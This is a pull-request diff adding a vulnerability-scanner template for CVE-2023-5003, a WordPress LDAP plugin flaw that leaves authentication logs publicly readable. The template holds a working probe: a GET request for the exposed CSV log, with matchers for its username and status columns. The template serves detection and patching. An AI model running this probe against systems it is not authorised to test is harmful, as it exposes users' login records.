Merge pull request #9677 from Kazgangap/activedirect-wordpress

cve-2023-5003 add

http/cves/2023/CVE-2023-5003.yaml

@@ -0,0 +1,45 @@
+id: CVE-2023-5003
+
+info:
+  name: Active Directory Integration WP Plugin < 4.1.10 - Log Disclosure
+  author: Kazgangap
+  severity: high
+  description: |
+    The Active Directory Integration / LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so.
+  remediation: Fixed in 4.1.10
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-5003
+    - https://wpscan.com/vulnerability/91f4e500-71f3-4ef6-9cc7-24a7c12a5748/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2023-5003
+    epss-score: 0.00084
+    epss-percentile: 0.35074
+    cpe: cpe:2.3:a:miniorange:active_directory_integration_\/_ldap_integration:*:*:*:*:*:wordpress:*:*
+  metadata:
+    vendor: miniorange
+    product: active_directory_integration_\/_ldap_integration
+    framework: wordpress
+    verified: true
+    max-request: 1
+  tags: wpscan,exposure,csv,ldap,cve2023,wordpress,wp-plugin
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/ldap-authentication-report.csv"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "ID"
+          - "USERNAME"
+          - "TIME"
+          - "LDAP STATUS"
+        condition: and
+
+      - type: status
+        status:
+          - 200